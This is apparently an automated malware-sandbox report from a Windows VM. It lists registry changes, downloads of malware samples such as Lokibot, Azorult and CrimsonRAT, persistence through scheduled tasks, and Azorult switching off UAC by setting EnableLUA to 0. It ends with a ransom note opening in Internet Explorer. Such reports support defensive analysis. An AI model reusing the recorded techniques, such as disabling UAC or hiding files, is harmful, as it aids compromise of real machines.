Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_CLASSES\INTERFACE\{5D65DD0D-81BF-4FF4-AEEA-6EFFB445CB3F}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_CLASSES\TYPELIB\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\HELPDIR	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ThreadingModel = "Apartment"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider\CurVer	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib\Version = "1.0"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\FLAGS	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe\\1"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{0f872661-c863-47a4-863f-c065c182858a}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib\Version = "1.0"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_CLASSES\WOW6432NODE\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\INPROCSERVER32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\FileSyncClient.AutoPlayHandler\shell\import\DropTarget	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\0	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\ = "FileSyncLibrary 1.0 Type Library"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\NucleusToastActivator.NucleusToastActivator.1	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\ = "IFileSyncClient3"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ = "IFileSyncClient4"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib\Version = "1.0"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\TypeLib\{4B1C80DA-FA45-468F-B42B-46496BDBE0C5}\1.0\FLAGS	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TypeLib\ = "{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\IE.AssocFile.URL\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\FileSyncClient.AutoPlayHandler.1\CLSID\ = "{5999E1EE-711E-48D2-9884-851A709F543D}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\TypeLib\{F904F88C-E60D-4327-9FA2-865AD075B400}\1.0\FLAGS	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32	OneDrive.exe

NTFS ADS 22 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\02ca4397da55b3175aaa1ad2c99981e792f66151.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\smb-b_8ti77_.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\HawkEye.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\BlueScreen(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\BonziKill.txt:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\CobaltStrike(1).doc:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\MinecraftInstaller.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Minecraft.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\FreeLauncher.exe:Zone.Identifier	firefox.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File created	C:\Users\Admin\Downloads\VanToM-Rat.bat:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe\:Zone.Identifier:$DATA	VanToM-Rat.bat
File created	C:\Users\Admin\Downloads\MinecraftInstaller(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\butterflyondesktop(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\DudleyTrojan.bat:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\CobaltStrike.doc:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\BlueScreen.exe:Zone.Identifier	firefox.exe

Runs .reg file with regedit 2 IoCs

pid	Process
3756	regedit.exe
8168	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4184	schtasks.exe
4972	schtasks.exe
7716	schtasks.exe
7884	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5024	OneDrive.exe
4980	OneDrive.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5024	OneDrive.exe
5024	OneDrive.exe
2752	OneDriveSetup.exe
2752	OneDriveSetup.exe
2752	OneDriveSetup.exe
2752	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
3652	OneDriveSetup.exe
4980	OneDrive.exe
4980	OneDrive.exe
1452	Lokibot.exe
1452	Lokibot.exe
3324	Lokibot.exe
3324	Lokibot.exe
1452	Lokibot.exe
1452	Lokibot.exe
6024	Azorult.exe
6024	Azorult.exe
6024	Azorult.exe
6024	Azorult.exe
6024	Azorult.exe
6024	Azorult.exe
6024	Azorult.exe
6024	Azorult.exe
6024	Azorult.exe
6024	Azorult.exe
1644	rutserv.exe
1644	rutserv.exe
1644	rutserv.exe
1644	rutserv.exe
1644	rutserv.exe
1644	rutserv.exe
992	rutserv.exe
992	rutserv.exe
468	rutserv.exe
468	rutserv.exe
3900	rutserv.exe
3900	rutserv.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2976	taskhostw.exe

Suspicious behavior: LoadsDriver 9 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
7496	msedge.exe
7496	msedge.exe
7496	msedge.exe
7496	msedge.exe
7496	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
7528	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2752	OneDriveSetup.exe
Token: SeIncreaseQuotaPrivilege	3652	OneDriveSetup.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	7396	MinecraftInstaller(1).exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2904	FreeLauncher.exe
Token: SeDebugPrivilege	7980	FreeLauncher.exe
Token: SeDebugPrivilege	5588	FreeLauncher.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	7844	FreeLauncher.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	7984	HawkEye.exe
Token: SeDebugPrivilege	1452	Lokibot.exe
Token: SeDebugPrivilege	3324	Lokibot.exe
Token: SeDebugPrivilege	1644	rutserv.exe
Token: SeDebugPrivilege	468	rutserv.exe
Token: SeTakeOwnershipPrivilege	3900	rutserv.exe
Token: SeTcbPrivilege	3900	rutserv.exe
Token: SeTcbPrivilege	3900	rutserv.exe
Token: SeDebugPrivilege	7704	taskkill.exe
Token: SeDebugPrivilege	2212	taskkill.exe
Token: SeDebugPrivilege	7796	taskkill.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeAuditPrivilege	5048	svchost.exe
Token: SeDebugPrivilege	1964	RDPWInst.exe
Token: SeAuditPrivilege	7444	svchost.exe
Token: SeDebugPrivilege	5820	taskkill.exe
Token: SeDebugPrivilege	7004	taskkill.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	2984	firefox.exe
Token: SeDebugPrivilege	4868	CrimsonRAT.exe
Token: SeDebugPrivilege	4868	CrimsonRAT.exe
Token: SeDebugPrivilege	4868	CrimsonRAT.exe
Token: SeDebugPrivilege	4868	CrimsonRAT.exe
Token: SeDebugPrivilege	4868	CrimsonRAT.exe
Token: SeDebugPrivilege	4868	CrimsonRAT.exe
Token: SeDebugPrivilege	4868	CrimsonRAT.exe
Token: SeDebugPrivilege	4868	CrimsonRAT.exe
Token: SeDebugPrivilege	2984	firefox.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
5024	OneDrive.exe
5024	OneDrive.exe
5024	OneDrive.exe
5024	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
4944	butterflyondesktop.tmp
1408	ButterflyOnDesktop.exe
7496	msedge.exe
8336	VanToM-Rat.bat
8636	Server.exe

Suspicious use of SendNotifyMessage 11 IoCs

pid	Process
5024	OneDrive.exe
5024	OneDrive.exe
5024	OneDrive.exe
5024	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
2984	firefox.exe
2984	firefox.exe
1408	ButterflyOnDesktop.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
5024	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
4816	javaw.exe
4816	javaw.exe
4816	javaw.exe
4816	javaw.exe
7260	GameBar.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2904	FreeLauncher.exe
2904	FreeLauncher.exe
4816	javaw.exe
4816	javaw.exe
832	FreeLauncher.exe
832	FreeLauncher.exe
7980	FreeLauncher.exe
7980	FreeLauncher.exe
1084	FreeLauncher.exe
1084	FreeLauncher.exe
5588	FreeLauncher.exe
5588	FreeLauncher.exe
7844	FreeLauncher.exe
7844	FreeLauncher.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe
2984	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5024 wrote to memory of 2752	5024	OneDrive.exe	104
PID 5024 wrote to memory of 2752	5024	OneDrive.exe	104
PID 5024 wrote to memory of 2752	5024	OneDrive.exe	104
PID 3652 wrote to memory of 1048	3652	OneDriveSetup.exe	112
PID 3652 wrote to memory of 1048	3652	OneDriveSetup.exe	112
PID 3652 wrote to memory of 1048	3652	OneDriveSetup.exe	112
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 4492 wrote to memory of 2984	4492	firefox.exe	124
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 868	2984	firefox.exe	125
PID 2984 wrote to memory of 5144	2984	firefox.exe	126
PID 2984 wrote to memory of 5144	2984	firefox.exe	126

System policy modification 1 TTPs 3 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 6 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1764	attrib.exe
2928	attrib.exe
980	attrib.exe
4184	attrib.exe
7344	attrib.exe
7424	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Gorilla Tag.exe
"C:\Users\Admin\AppData\Local\Temp\Gorilla Tag.exe"
1⤵
PID:1396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3856,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=4048 /prefetch:14
1⤵
PID:2332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=4080,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=5512 /prefetch:14
1⤵
PID:1664

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5368,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=5532 /prefetch:14
1⤵
PID:1656

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
1⤵
- Modifies system executable filetype association
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5024
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
  "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
  2⤵
  - Executes dropped EXE
  - Checks system information in the registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe /update /restart /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode
    3⤵
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Adds Run key to start application
    - Checks system information in the registry
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3652
  - - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe
      "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops desktop.ini file(s)
      System Location Discovery: System Language Discovery
      PID:1048
  - - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
      /updateInstalled /background
      4⤵
      Chimera
      Executes dropped EXE
      Loads dropped DLL
      Modifies system executable filetype association
      Drops desktop.ini file(s)
      Checks system information in the registry
      Drops file in Program Files directory
      Modifies Internet Explorer settings
      Modifies registry class
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:4980
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Downloads\YOUR_FILES_ARE_ENCRYPTED.HTML"
        5⤵
        Modifies Internet Explorer settings
        
        PID:3156
